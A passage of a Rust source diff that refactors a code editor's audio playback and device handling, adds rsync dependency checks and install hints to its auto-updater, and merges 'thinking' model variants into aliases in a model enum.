- let Some(devices) = default_host().devices().ok() else {
- return Vec::new();
- };
- devices
- .filter_map(|device| {
- let id = device.id().ok()?;
- let desc = device.description().ok()?;
- Some(AudioDeviceInfo { id, desc })
- })
- .collect()
-}
-
-#[derive(Default, Clone, Debug)]
-pub struct AvailableAudioDevices(pub Vec<AudioDeviceInfo>);
-
-impl Global for AvailableAudioDevices {}
@@ -0,0 +1,247 @@
+use anyhow::{Context as _, Result};
+use collections::HashMap;
+use cpal::{
+ DeviceDescription, DeviceId, default_host,
+ traits::{DeviceTrait, HostTrait},
+};
+use gpui::{App, AsyncApp, BorrowAppContext, Global};
+
+pub(super) use cpal::Sample;
+
+use rodio::{Decoder, DeviceSinkBuilder, MixerDeviceSink, Source, mixer::Mixer, source::Buffered};
+use settings::Settings;
+use std::io::Cursor;
+use util::ResultExt;
+
+mod echo_canceller;
+use echo_canceller::EchoCanceller;
+mod rodio_ext;
+pub use crate::audio_settings::AudioSettings;
+pub use rodio_ext::RodioExt;
+
+use crate::audio_settings::LIVE_SETTINGS;
+
+use crate::Sound;
+
+use super::{CHANNEL_COUNT, SAMPLE_RATE};
+pub const BUFFER_SIZE: usize = // echo canceller and livekit want 10ms of audio
+ (SAMPLE_RATE.get() as usize / 100) * CHANNEL_COUNT.get() as usize;
+
+pub fn init(cx: &mut App) {
+ LIVE_SETTINGS.initialize(cx);
+}
+
+// TODO(jk): this is currently cached only once - we should observe and react instead
+pub fn ensure_devices_initialized(cx: &mut App) {
+ if cx.has_global::<AvailableAudioDevices>() {
+ return;
+ }
+ cx.default_global::<AvailableAudioDevices>();
+ let task = cx
+ .background_executor()
+ .spawn(async move { get_available_audio_devices() });
+ cx.spawn(async move |cx: &mut AsyncApp| {
+ let devices = task.await;
+ cx.update(|cx| cx.set_global(AvailableAudioDevices(devices)));
+ cx.refresh();
+ })
+ .detach();
+}
+
+#[derive(Default)]
+pub struct Audio {
+ output: Option<(MixerDeviceSink, Mixer)>,
+ pub echo_canceller: EchoCanceller,
+ source_cache: HashMap<Sound, Buffered<Decoder<Cursor<Vec<u8>>>>>,
+}
+
+impl Global for Audio {}
+
+impl Audio {
+ fn ensure_output_exists(&mut self, output_audio_device: Option<DeviceId>) -> Result<&Mixer> {
+ #[cfg(debug_assertions)]
+ log::warn!(
+ "Audio does not sound correct without optimizations. Use a release build to debug audio issues"
+ );
+
+ if self.output.is_none() {
+ let (output_handle, output_mixer) =
+ open_output_stream(output_audio_device, self.echo_canceller.clone())?;
+ self.output = Some((output_handle, output_mixer));
+ }
+
+ Ok(self
+ .output
+ .as_ref()
+ .map(|(_, mixer)| mixer)
+ .expect("we only get here if opening the outputstream succeeded"))
+ }
+
+ pub fn play_sound(sound: Sound, cx: &mut App) {
+ let output_audio_device = AudioSettings::get_global(cx).output_audio_device.clone();
+ cx.update_default_global(|this: &mut Self, cx| {
+ let source = this.sound_source(sound, cx).log_err()?;
+ let output_mixer = this
+ .ensure_output_exists(output_audio_device)
+ .context("Could not get output mixer")
+ .log_err()?;
+
+ output_mixer.add(source);
+ Some(())
+ });
+ }
+
+ pub fn end_call(cx: &mut App) {
+ cx.update_default_global(|this: &mut Self, _cx| {
+ this.output.take();
+ });
+ }
+
+ fn sound_source(&mut self, sound: Sound, cx: &App) -> Result<impl Source + use<>> {
+ if let Some(wav) = self.source_cache.get(&sound) {
+ return Ok(wav.clone());
+ }
+
+ let path = format!("sounds/{}.wav", sound.file());
+ let bytes = cx
+ .asset_source()
+ .load(&path)?
+ .map(anyhow::Ok)
+ .with_context(|| format!("No asset available for path {path}"))??
+ .into_owned();
+ let cursor = Cursor::new(bytes);
+ let source = Decoder::new(cursor)?.buffered();
+
+ self.source_cache.insert(sound, source.clone());
+
+ Ok(source)
+ }
+}
+
+pub fn open_input_stream(
+ device_id: Option<DeviceId>,
+) -> anyhow::Result<rodio::microphone::Microphone> {
+ let builder = rodio::microphone::MicrophoneBuilder::new();
+ let builder = if let Some(id) = device_id {
+ // TODO(jk): upstream patch
+ // if let Some(input_device) = default_host().device_by_id(id) {
+ // builder.device(input_device);
+ // }
+ let mut found = None;
+ for input in rodio::microphone::available_inputs()? {
+ if input.clone().into_inner().id()? == id {
+ found = Some(builder.device(input));
+ break;
+ }
+ }
+ found.unwrap_or_else(|| builder.default_device())?
+ } else {
+ builder.default_device()?
+ };
+ let stream = builder
+ .default_config()?
+ .prefer_sample_rates([
+ SAMPLE_RATE,
+ SAMPLE_RATE.saturating_mul(rodio::nz!(2)),
+ SAMPLE_RATE.saturating_mul(rodio::nz!(3)),
+ SAMPLE_RATE.saturating_mul(rodio::nz!(4)),
+ ])
+ .prefer_channel_counts([rodio::nz!(1), rodio::nz!(2), rodio::nz!(3), rodio::nz!(4)])
+ .prefer_buffer_sizes(512..)
+ .open_stream()?;
+ log::info!("Opened microphone: {:?}", stream.config());
+ Ok(stream)
+}
+
+pub fn resolve_device(device_id: Option<&DeviceId>, input: bool) -> anyhow::Result<cpal::Device> {
+ if let Some(id) = device_id {
+ if let Some(device) = default_host().device_by_id(id) {
+ return Ok(device);
+ }
+ log::warn!("Selected audio device not found, falling back to default");
+ }
+ if input {
+ default_host()
+ .default_input_device()
+ .context("no audio input device available")
+ } else {
+ default_host()
+ .default_output_device()
+ .context("no audio output device available")
+ }
+}
+
+pub fn open_test_output(device_id: Option<DeviceId>) -> anyhow::Result<MixerDeviceSink> {
+ let device = resolve_device(device_id.as_ref(), false)?;
+ DeviceSinkBuilder::from_device(device)?
+ .open_stream()
+ .context("Could not open output stream")
+}
+
+pub fn open_output_stream(
+ device_id: Option<DeviceId>,
+ mut echo_canceller: EchoCanceller,
+) -> anyhow::Result<(MixerDeviceSink, Mixer)> {
+ let device = resolve_device(device_id.as_ref(), false)?;
+ let mut output_handle = DeviceSinkBuilder::from_device(device)?
+ .open_stream()
+ .context("Could not open output stream")?;
+ output_handle.log_on_drop(false);
+ log::info!("Output stream: {:?}", output_handle);
+
+ let (output_mixer, source) = rodio::mixer::mixer(CHANNEL_COUNT, SAMPLE_RATE);
+ // otherwise the mixer ends as it's empty
+ output_mixer.add(rodio::source::Zero::new(CHANNEL_COUNT, SAMPLE_RATE));
+ let echo_cancelling_source = source // apply echo cancellation just before output
+ .inspect_buffer::<BUFFER_SIZE, _>(move |buffer| {
+ let mut buf: [i16; _] = buffer.map(|s| s.to_sample());
+ echo_canceller.process_reverse_stream(&mut buf)
+ });
+ output_handle.mixer().add(echo_cancelling_source);
+
+ Ok((output_handle, output_mixer))
+}
+
+#[derive(Clone, Debug)]
+pub struct AudioDeviceInfo {
+ pub id: DeviceId,
+ pub desc: DeviceDescription,
+}
+
+impl AudioDeviceInfo {
+ pub fn matches_input(&self, is_input: bool) -> bool {
+ if is_input {
+ self.desc.supports_input()
+ } else {
+ self.desc.supports_output()
+ }
+ }
+
+ pub fn matches(&self, id: &DeviceId, is_input: bool) -> bool {
+ &self.id == id && self.matches_input(is_input)
+ }
+}
+
+impl std::fmt::Display for AudioDeviceInfo {
+ fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+ write!(f, "{} ({})", self.desc.name(), self.id)
+ }
+}
+
+fn get_available_audio_devices() -> Vec<AudioDeviceInfo> {
+ let Some(devices) = default_host().devices().ok() else {
+ return Vec::new();
+ };
+ devices
+ .filter_map(|device| {
+ let id = device.id().ok()?;
+ let desc = device.description().ok()?;
+ Some(AudioDeviceInfo { id, desc })
+ })
+ .collect()
+}
+
+#[derive(Default, Clone, Debug)]
+pub struct AvailableAudioDevices(pub Vec<AudioDeviceInfo>);
+
+impl Global for AvailableAudioDevices {}
@@ -0,0 +1,54 @@
+#[cfg(not(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd")))]
+mod real_implementation {
+ use anyhow::Context;
+ use libwebrtc::native::apm;
+ use parking_lot::Mutex;
+ use std::sync::Arc;
+
+ use crate::{CHANNEL_COUNT, SAMPLE_RATE};
+
+ #[derive(Clone)]
+ pub struct EchoCanceller(Arc<Mutex<apm::AudioProcessingModule>>);
+
+ impl Default for EchoCanceller {
+ fn default() -> Self {
+ Self(Arc::new(Mutex::new(apm::AudioProcessingModule::new(
+ true, false, false, false,
+ ))))
+ }
+ }
+
+ impl EchoCanceller {
+ pub fn process_reverse_stream(&mut self, buf: &mut [i16]) {
+ self.0
+ .lock()
+ .process_reverse_stream(buf, SAMPLE_RATE.get() as i32, CHANNEL_COUNT.get().into())
+ .expect("Audio input and output threads should not panic");
+ }
+
+ pub fn process_stream(&mut self, buf: &mut [i16]) -> anyhow::Result<()> {
+ self.0
+ .lock()
+ .process_stream(buf, SAMPLE_RATE.get() as i32, CHANNEL_COUNT.get() as i32)
+ .context("livekit audio processor error")
+ }
+ }
+}
+
+#[cfg(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd"))]
+mod fake_implementation {
+ #[derive(Clone, Default)]
+ pub struct EchoCanceller;
+
+ impl EchoCanceller {
+ pub fn process_reverse_stream(&mut self, _buf: &mut [i16]) {}
+ pub fn process_stream(&mut self, _buf: &mut [i16]) -> anyhow::Result<()> {
+ Ok(())
+ }
+ }
+}
+
+#[cfg(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd"))]
+pub use fake_implementation::EchoCanceller;
+#[cfg(not(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd")))]
+pub use real_implementation::EchoCanceller;
@@ -9,12 +9,6 @@ use settings::{RegisterSetting, Settings, SettingsStore};
#[derive(Clone, Debug, RegisterSetting)]
pub struct AudioSettings {
- /// Opt into the new audio system.
- ///
- /// You need to rejoin a call for this setting to apply
- pub rodio_audio: bool, // default is false
- /// Requires 'rodio_audio: true'
- ///
 /// Automatically increase or decrease your microphone's volume. This affects how
/// loud you sound to others.
///
@@ -23,25 +17,6 @@ pub struct AudioSettings {
/// audio and has auto speaker volume on this will make you very loud
/// compared to other speakers.
pub auto_microphone_volume: bool,
- /// Requires 'rodio_audio: true'
- ///
- /// Automatically increate or decrease the volume of other call members.
- /// This only affects how things sound for you.
- pub auto_speaker_volume: bool,
- /// Requires 'rodio_audio: true'
- ///
- /// Remove background noises. Works great for typing, cars, dogs, AC. Does
- /// not work well on music.
- pub denoise: bool,
- /// Requires 'rodio_audio: true'
- ///
- /// Use audio parameters compatible with the previous versions of
- /// experimental audio and non-experimental audio. When this is false you
- /// will sound strange to anyone not on the latest experimental audio. In
- /// the future we will migrate by setting this to false
- ///
- /// You need to rejoin a call for this setting to apply
- pub legacy_audio_compatible: bool,
/// Select specific output audio device.
pub output_audio_device: Option<DeviceId>,
/// Select specific input audio device.
@@ -53,11 +28,7 @@ impl Settings for AudioSettings {
fn from_settings(content: &settings::SettingsContent) -> Self {
let audio = &content.audio.as_ref().unwrap();
AudioSettings {
- rodio_audio: audio.rodio_audio.unwrap(),
auto_microphone_volume: audio.auto_microphone_volume.unwrap(),
- auto_speaker_volume: audio.auto_speaker_volume.unwrap(),
- denoise: audio.denoise.unwrap(),
- legacy_audio_compatible: audio.legacy_audio_compatible.unwrap(),
output_audio_device: audio
.output_audio_device
.as_ref()
@@ -71,10 +42,8 @@ impl Settings for AudioSettings {
}
/// See docs on [LIVE_SETTINGS]
-pub(crate) struct LiveSettings {
- pub(crate) auto_microphone_volume: AtomicBool,
- pub(crate) auto_speaker_volume: AtomicBool,
- pub(crate) denoise: AtomicBool,
+pub struct LiveSettings {
+ pub auto_microphone_volume: AtomicBool,
}
impl LiveSettings {
@@ -84,24 +53,6 @@ impl LiveSettings {
AudioSettings::get_global(cx).auto_microphone_volume,
Ordering::Relaxed,
);
- LIVE_SETTINGS.auto_speaker_volume.store(
- AudioSettings::get_global(cx).auto_speaker_volume,
- Ordering::Relaxed,
- );
-
- let denoise_enabled = AudioSettings::get_global(cx).denoise;
- #[cfg(debug_assertions)]
- {
- static DENOISE_WARNING_SEND: AtomicBool = AtomicBool::new(false);
- if denoise_enabled && !DENOISE_WARNING_SEND.load(Ordering::Relaxed) {
- DENOISE_WARNING_SEND.store(true, Ordering::Relaxed);
- log::warn!("Denoise does not work on debug builds, not enabling")
- }
- }
- #[cfg(not(debug_assertions))]
- LIVE_SETTINGS
- .denoise
- .store(denoise_enabled, Ordering::Relaxed);
})
.detach();
@@ -109,18 +60,6 @@ impl LiveSettings {
LIVE_SETTINGS
.auto_microphone_volume
.store(init_settings.auto_microphone_volume, Ordering::Relaxed);
- LIVE_SETTINGS
- .auto_speaker_volume
- .store(init_settings.auto_speaker_volume, Ordering::Relaxed);
- let denoise_enabled = AudioSettings::get_global(cx).denoise;
- #[cfg(debug_assertions)]
- if denoise_enabled {
- log::warn!("Denoise does not work on debug builds, not enabling")
- }
- #[cfg(not(debug_assertions))]
- LIVE_SETTINGS
- .denoise
- .store(denoise_enabled, Ordering::Relaxed);
}
}
@@ -128,8 +67,6 @@ impl LiveSettings {
/// observer of SettingsStore. Needed because audio playback and recording are
/// real time and must each run in a dedicated OS thread, therefore we can not
/// use the background executor.
-pub(crate) static LIVE_SETTINGS: LiveSettings = LiveSettings {
+pub static LIVE_SETTINGS: LiveSettings = LiveSettings {
auto_microphone_volume: AtomicBool::new(true),
- auto_speaker_volume: AtomicBool::new(true),
- denoise: AtomicBool::new(true),
};
@@ -1,77 +0,0 @@
-use anyhow::{Context, anyhow};
-use async_tar::{Builder, Header};
-use gpui::{BackgroundExecutor, Task};
-
-use collections::HashMap;
-use parking_lot::Mutex;
-use rodio::Source;
-use smol::fs::File;
-use std::{io, path::PathBuf, sync::Arc, time::Duration};
-
-use crate::{REPLAY_DURATION, rodio_ext::Replay};
-
-#[derive(Default, Clone)]
-pub(crate) struct Replays(Arc<Mutex<HashMap<String, Replay>>>);
-
-impl Replays {
- pub(crate) fn add_voip_stream(&self, stream_name: String, source: Replay) {
- let mut map = self.0.lock();
- map.retain(|_, replay| replay.source_is_active());
- map.insert(stream_name, source);
- }
-
- pub(crate) fn replays_to_tar(
- &self,
- executor: BackgroundExecutor,
- ) -> Task<anyhow::Result<(PathBuf, Duration)>> {
- let map = Arc::clone(&self.0);
- executor.spawn(async move {
- let recordings: Vec<_> = map
- .lock()
- .iter_mut()
- .map(|(name, replay)| {
- let queued = REPLAY_DURATION.min(replay.duration_ready());
- (name.clone(), replay.take_duration(queued).record())
- })
- .collect();
- let longest = recordings
- .iter()
- .map(|(_, r)| {
- r.total_duration()
- .expect("SamplesBuffer always returns a total duration")
- })
- .max()
- .ok_or(anyhow!("There is no audio to capture"))?;
-
- let path = std::env::current_dir()
- .context("Could not get current dir")?
- .join("replays.tar");
- let tar = File::create(&path)
- .await
- .context("Could not create file for tar")?;
-
- let mut tar = Builder::new(tar);
-
- for (name, recording) in recordings {
- let mut writer = io::Cursor::new(Vec::new());
- rodio::wav_to_writer(recording, &mut writer).context("failed to encode wav")?;
- let wav_data = writer.into_inner();
- let path = name.replace(' ', "_") + ".wav";
- let mut header = Header::new_gnu();
- // rw permissions for everyone
- header.set_mode(0o666);
- header.set_size(wav_data.len() as u64);
- tar.append_data(&mut header, path, wav_data.as_slice())
- .await
- .context("failed to apped wav to tar")?;
- }
- tar.into_inner()
- .await
- .context("Could not finish writing tar")?
- .sync_all()
- .await
- .context("Could not flush tar file to disk")?;
- Ok((path, longest))
- })
- }
-}
@@ -1,6 +1,6 @@
use anyhow::{Context as _, Result};
use client::Client;
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use futures_lite::StreamExt;
use gpui::{
App, AppContext as _, AsyncApp, BackgroundExecutor, Context, Entity, Global, Task, Window,
@@ -30,9 +30,64 @@ use util::command::new_command;
use workspace::Workspace;
const SHOULD_SHOW_UPDATE_NOTIFICATION_KEY: &str = "auto-updater-should-show-updated-notification";
+
+#[derive(Debug)]
+struct MissingDependencyError(String);
+
+impl std::fmt::Display for MissingDependencyError {
+ fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+ write!(f, "{}", self.0)
+ }
+}
+
+impl std::error::Error for MissingDependencyError {}
const POLL_INTERVAL: Duration = Duration::from_secs(60 * 60);
const REMOTE_SERVER_CACHE_LIMIT: usize = 5;
+#[cfg(target_os = "linux")]
+fn linux_rsync_install_hint() -> &'static str {
+ let os_release = match std::fs::read_to_string("/etc/os-release") {
+ Ok(os_release) => os_release,
+ Err(_) => return "Please install rsync using your package manager",
+ };
+
+ let mut distribution_ids = Vec::new();
+ for line in os_release.lines() {
+ let trimmed = line.trim();
+ if let Some(value) = trimmed.strip_prefix("ID=") {
+ distribution_ids.push(value.trim_matches('"').to_ascii_lowercase());
+ } else if let Some(value) = trimmed.strip_prefix("ID_LIKE=") {
+ for id in value.trim_matches('"').split_whitespace() {
+ distribution_ids.push(id.to_ascii_lowercase());
+ }
+ }
+ }
+
+ let package_manager_hint = if distribution_ids
+ .iter()
+ .any(|distribution_id| distribution_id == "arch")
+ {
+ Some("Install it with: sudo pacman -S rsync")
+ } else if distribution_ids
+ .iter()
+ .any(|distribution_id| distribution_id == "debian" || distribution_id == "ubuntu")
+ {
+ Some("Install it with: sudo apt install rsync")
+ } else if distribution_ids.iter().any(|distribution_id| {
+ distribution_id == "fedora"
+ || distribution_id == "rhel"
+ || distribution_id == "centos"
+ || distribution_id == "rocky"
+ || distribution_id == "almalinux"
+ }) {
+ Some("Install it with: sudo dnf install rsync")
+ } else {
+ None
+ };
+
+ package_manager_hint.unwrap_or("Please install rsync using your package manager")
+}
+
actions!(
auto_update,
[
@@ -252,7 +307,9 @@ pub fn release_notes_url(cx: &mut App) -> Option<String> {
ReleaseChannel::Stable | ReleaseChannel::Preview => {
let auto_updater = AutoUpdater::get(cx)?;
let auto_updater = auto_updater.read(cx);
- let current_version = &auto_updater.current_version;
+ let mut current_version = auto_updater.current_version.clone();
+ current_version.pre = semver::Prerelease::EMPTY;
+ current_version.build = semver::BuildMetadata::EMPTY;
let release_channel = release_channel.dev_name();
let path = format!("/releases/{release_channel}/{current_version}");
auto_updater.client.http_client().build_url(&path)
@@ -395,7 +452,15 @@ impl AutoUpdater {
this.update(cx, |this, cx| {
this.pending_poll = None;
if let Err(error) = result {
+ let is_missing_dependency =
+ error.downcast_ref::<MissingDependencyError>().is_some();
this.status = match check_type {
+ UpdateCheckType::Automatic if is_missing_dependency => {
+ log::warn!("auto-update: {}", error);
+ AutoUpdateStatus::Errored {
+ error: Arc::new(error),
+ }
+ }
// Be quiet if the check was automated (e.g. when offline)
UpdateCheckType::Automatic => {
log::info!("auto-update check failed: error:{:?}", error);
@@ -627,9 +692,13 @@ impl AutoUpdater {
cx.notify();
});
- let installer_dir = InstallerDir::new().await?;
+ let installer_dir = InstallerDir::new()
+ .await
+ .context("Failed to create installer dir")?;
let target_path = Self::target_path(&installer_dir).await?;
- download_release(&target_path, fetched_release_data, client).await?;
+ download_release(&target_path, fetched_release_data, client)
+ .await
+ .with_context(|| format!("Failed to download update to {}", target_path.display()))?;
this.update(cx, |this, cx| {
this.status = AutoUpdateStatus::Installing {
@@ -638,7 +707,9 @@ impl AutoUpdater {
cx.notify();
});
- let new_binary_path = Self::install_release(installer_dir, target_path, cx).await?;
+ let new_binary_path = Self::install_release(installer_dir, &target_path, cx)
+ .await
+ .with_context(|| format!("Failed to install update at: {}", target_path.display()))?;
if let Some(new_binary_path) = new_binary_path {
cx.update(|cx| cx.set_restart_path(new_binary_path));
}
@@ -707,11 +778,21 @@ impl AutoUpdater {
}
fn check_dependencies() -> Result<()> {
- #[cfg(not(target_os = "windows"))]
+ #[cfg(target_os = "linux")]
+ if which::which("rsync").is_err() {
+ let install_hint = linux_rsync_install_hint();
+ return Err(MissingDependencyError(format!(
+ "rsync is required for auto-updates but is not installed. {install_hint}"
+ ))
+ .into());
+ }
+
+ #[cfg(target_os = "macos")]
anyhow::ensure!(
which::which("rsync").is_ok(),
"Could not auto-update because the required rsync utility was not found."
);
+
Ok(())
}
@@ -728,7 +809,7 @@ impl AutoUpdater {
async fn install_release(
installer_dir: InstallerDir,
- target_path: PathBuf,
+ target_path: &Path,
cx: &AsyncApp,
) -> Result<Option<PathBuf>> {
#[cfg(test)]
@@ -750,8 +831,8 @@ impl AutoUpdater {
fetched_version: Version,
) -> Result<Option<VersionCheckType>> {
// For non-nightly releases, ignore build and pre-release fields as they're not provided by our endpoints right now.
- installed_version.build = semver::BuildMetadata::EMPTY;
installed_version.pre = semver::Prerelease::EMPTY;
+ installed_version.build = semver::BuildMetadata::EMPTY;
let should_download = fetched_version > installed_version;
let newer_version = should_download.then(|| VersionCheckType::Semantic(fetched_version));
Ok(newer_version)
@@ -762,17 +843,16 @@ impl AutoUpdater {
should_show: bool,
cx: &App,
) -> Task<Result<()>> {
+ let kvp = KeyValueStore::global(cx);
cx.background_spawn(async move {
if should_show {
- KEY_VALUE_STORE
- .write_kvp(
- SHOULD_SHOW_UPDATE_NOTIFICATION_KEY.to_string(),
- "".to_string(),
- )
- .await?;
+ kvp.write_kvp(
+ SHOULD_SHOW_UPDATE_NOTIFICATION_KEY.to_string(),
+ "".to_string(),
+ )
+ .await?;
} else {
- KEY_VALUE_STORE
- .delete_kvp(SHOULD_SHOW_UPDATE_NOTIFICATION_KEY.to_string())
+ kvp.delete_kvp(SHOULD_SHOW_UPDATE_NOTIFICATION_KEY.to_string())
.await?;
}
Ok(())
@@ -780,10 +860,9 @@ impl AutoUpdater {
}
pub fn should_show_update_notification(&self, cx: &App) -> Task<Result<bool>> {
+ let kvp = KeyValueStore::global(cx);
cx.background_spawn(async move {
- Ok(KEY_VALUE_STORE
- .read_kvp(SHOULD_SHOW_UPDATE_NOTIFICATION_KEY)?
- .is_some())
+ Ok(kvp.read_kvp(SHOULD_SHOW_UPDATE_NOTIFICATION_KEY)?.is_some())
})
}
}
@@ -886,7 +965,7 @@ async fn download_release(
async fn install_release_linux(
temp_dir: &InstallerDir,
- downloaded_tar_gz: PathBuf,
+ downloaded_tar_gz: &Path,
cx: &AsyncApp,
) -> Result<Option<PathBuf>> {
let channel = cx.update(|cx| ReleaseChannel::global(cx).dev_name());
@@ -898,13 +977,15 @@ async fn install_release_linux(
.await
.context("failed to create directory into which to extract update")?;
- let output = new_command("tar")
- .arg("-xzf")
+ let mut cmd = new_command("tar");
+ cmd.arg("-xzf")
.arg(&downloaded_tar_gz)
.arg("-C")
- .arg(&extracted)
+ .arg(&extracted);
+ let output = cmd
.output()
- .await?;
+ .await
+ .with_context(|| format!("failed to extract: {cmd:?}"))?;
anyhow::ensure!(
output.status.success(),
@@ -933,12 +1014,12 @@ async fn install_release_linux(
to = PathBuf::from(prefix);
}
- let output = new_command("rsync")
- .args(["-av", "--delete"])
- .arg(&from)
- .arg(&to)
+ let mut cmd = new_command("rsync");
+ cmd.args(["-av", "--delete"]).arg(&from).arg(&to);
+ let output = cmd
.output()
- .await?;
+ .await
+ .with_context(|| format!("failed to rsync: {cmd:?}"))?;
anyhow::ensure!(
output.status.success(),
@@ -953,7 +1034,7 @@ async fn install_release_linux(
async fn install_release_macos(
temp_dir: &InstallerDir,
- downloaded_dmg: PathBuf,
+ downloaded_dmg: &Path,
cx: &AsyncApp,
) -> Result<Option<PathBuf>> {
let running_app_path = cx.update(|cx| cx.app_path())?;
@@ -965,13 +1046,15 @@ async fn install_release_macos(
let mut mounted_app_path: OsString = mount_path.join(running_app_filename).into();
mounted_app_path.push("/");
- let output = new_command("hdiutil")
- .args(["attach", "-nobrowse"])
+ let mut cmd = new_command("hdiutil");
+ cmd.args(["attach", "-nobrowse"])
.arg(&downloaded_dmg)
.arg("-mountroot")
- .arg(temp_dir.path())
+ .arg(temp_dir.path());
+ let output = cmd
.output()
- .await?;
+ .await
+ .with_context(|| format!("failed to mount: {cmd:?}"))?;
anyhow::ensure!(
output.status.success(),
@@ -985,12 +1068,14 @@ async fn install_release_macos(
background_executor: cx.background_executor(),
};
- let output = new_command("rsync")
- .args(["-av", "--delete", "--exclude", "Icon?"])
+ let mut cmd = new_command("rsync");
+ cmd.args(["-av", "--delete", "--exclude", "Icon?"])
.arg(&mounted_app_path)
- .arg(&running_app_path)
+ .arg(&running_app_path);
+ let output = cmd
.output()
- .await?;
+ .await
+ .with_context(|| format!("failed to rsync: {cmd:?}"))?;
anyhow::ensure!(
output.status.success(),
@@ -1015,14 +1100,13 @@ async fn cleanup_windows() -> Result<()> {
Ok(())
}
-async fn install_release_windows(downloaded_installer: PathBuf) -> Result<Option<PathBuf>> {
- let output = new_command(downloaded_installer)
- .arg("/verysilent")
+async fn install_release_windows(downloaded_installer: &Path) -> Result<Option<PathBuf>> {
+ let mut cmd = new_command(downloaded_installer);
+ cmd.arg("/verysilent")
.arg("/update=true")
.arg("!desktopicon")
- .arg("!quicklaunchicon")
- .output()
- .await?;
+ .arg("!quicklaunchicon");
+ let output = cmd.output().await?;
anyhow::ensure!(
output.status.success(),
"failed to start installer: {:?}",
@@ -1087,9 +1171,7 @@ mod tests {
use super::*;
- pub(super) struct InstallOverride(
- pub Rc<dyn Fn(PathBuf, &AsyncApp) -> Result<Option<PathBuf>>>,
- );
+ pub(super) struct InstallOverride(pub Rc<dyn Fn(&Path, &AsyncApp) -> Result<Option<PathBuf>>>);
impl Global for InstallOverride {}
#[gpui::test]
@@ -270,8 +270,8 @@ pub fn notify_if_app_was_updated(cx: &mut App) {
if should_show_notification {
cx.update(|cx| {
let mut version = updater.read(cx).current_version();
- version.build = semver::BuildMetadata::EMPTY;
version.pre = semver::Prerelease::EMPTY;
+ version.build = semver::BuildMetadata::EMPTY;
let app_name = ReleaseChannel::global(cx).display_name();
if let Some(content) = announcement_for_version(&version) {
@@ -48,49 +48,49 @@ pub enum Model {
// Anthropic Claude 4+ models
#[serde(rename = "claude-haiku-4-5", alias = "claude-haiku-4-5-latest")]
ClaudeHaiku4_5,
- #[serde(rename = "claude-sonnet-4", alias = "claude-sonnet-4-latest")]
- ClaudeSonnet4,
#[serde(
- rename = "claude-sonnet-4-thinking",
+ rename = "claude-sonnet-4",
+ alias = "claude-sonnet-4-latest",
+ alias = "claude-sonnet-4-thinking",
alias = "claude-sonnet-4-thinking-latest"
)]
- ClaudeSonnet4Thinking,
+ ClaudeSonnet4,
#[default]
- #[serde(rename = "claude-sonnet-4-5", alias = "claude-sonnet-4-5-latest")]
- ClaudeSonnet4_5,
#[serde(
- rename = "claude-sonnet-4-5-thinking",
+ rename = "claude-sonnet-4-5",
+ alias = "claude-sonnet-4-5-latest",
+ alias = "claude-sonnet-4-5-thinking",
alias = "claude-sonnet-4-5-thinking-latest"
)]
- ClaudeSonnet4_5Thinking,
- #[serde(rename = "claude-opus-4-1", alias = "claude-opus-4-1-latest")]
- ClaudeOpus4_1,
+ ClaudeSonnet4_5,
#[serde(
- rename = "claude-opus-4-1-thinking",
+ rename = "claude-opus-4-1",
+ alias = "claude-opus-4-1-latest",
+ alias = "claude-opus-4-1-thinking",
alias = "claude-opus-4-1-thinking-latest"
)]
- ClaudeOpus4_1Thinking,
- #[serde(rename = "claude-opus-4-5", alias = "claude-opus-4-5-latest")]
- ClaudeOpus4_5,
+ ClaudeOpus4_1,
#[serde(
- rename = "claude-opus-4-5-thinking",
+ rename = "claude-opus-4-5",
+ alias = "claude-opus-4-5-latest",
+ alias = "claude-opus-4-5-thinking",
alias = "claude-opus-4-5-thinking-latest"
)]
- ClaudeOpus4_5Thinking,
- #[serde(rename = "claude-opus-4-6", alias = "claude-opus-4-6-latest")]
- ClaudeOpus4_6,
+ ClaudeOpus4_5,
#[serde(
- rename = "claude-opus-4-6-thinking",
+ rename = "claude-opus-4-6",
+ alias = "claude-opus-4-6-latest",
+ alias = "claude-opus-4-6-thinking",
alias = "claude-opus-4-6-thinking-latest"
)]
- ClaudeOpus4_6Thinking,
- #[serde(rename = "claude-sonnet-4-6", alias = "claude-sonnet-4-6-latest")]
- ClaudeSonnet4_6,
+ ClaudeOpus4_6,
#[serde(
- rename = "claude-sonnet-4-6-thinking",
+ rename = "claude-sonnet-4-6",
+ alias = "claude-sonnet-4-6-latest",
+ alias = "claude-sonnet-4-6-thinking",
alias = "claude-sonnet-4-6-thinking-latest"
)]
- ClaudeSonnet4_6Thinking,
+ ClaudeSonnet4_6,
// Meta Llama 4 models
#[serde(rename = "llama-4-scout-17b")]
@@ -181,28 +181,16 @@ impl Model {
}
pub fn from_id(id: &str) -> anyhow::Result<Self> {
- if id.starts_with("claude-opus-4-6-thinking") {
- Ok(Self::ClaudeOpus4_6Thinking)
- } else if id.starts_with("claude-opus-4-6") {
+ if id.starts_with("claude-opus-4-6") {
Ok(Self::ClaudeOpus4_6)
- } else if id.starts_with("claude-opus-4-5-thinking") {
- Ok(Self::ClaudeOpus4_5Thinking)
} else if id.starts_with("claude-opus-4-5") {
Ok(Self::ClaudeOpus4_5)
- } else if id.starts_with("claude-opus-4-1-thinking") {
- Ok(Self::ClaudeOpus4_1Thinking)
} else if id.starts_with("claude-opus-4-1") {
Ok(Self::ClaudeOpus4_1)
- } else if id.starts_with("claude-sonnet-4-6-thinking") {
- Ok(Self::ClaudeSonnet4_6Thinking)
} else if id.starts_with("claude-sonnet-4-6") {
Ok(Self::ClaudeSonnet4_6)
- } else if id.starts_with("claude-sonnet-4-5-thinking") {
- Ok(Self::ClaudeSonnet4_5Thinking)
} else if id.starts_with("claude-sonnet-4-5") {
Ok(Self::ClaudeSonnet4_5)
- } else if id.starts_with("claude-sonnet-4-thinking") {
- Ok(Self::ClaudeSonnet4Thinking)
} else if id.starts_with("claude-sonnet-4") {
Ok(Self::ClaudeSonnet4)
} else if id.starts_with("claude-haiku-4-5") {
@@ -216,17 +204,11 @@ impl Model {
match self {
Self::ClaudeHaiku4_5 => "claude-haiku-4-5",
Self::ClaudeSonnet4 => "claude-sonnet-4",
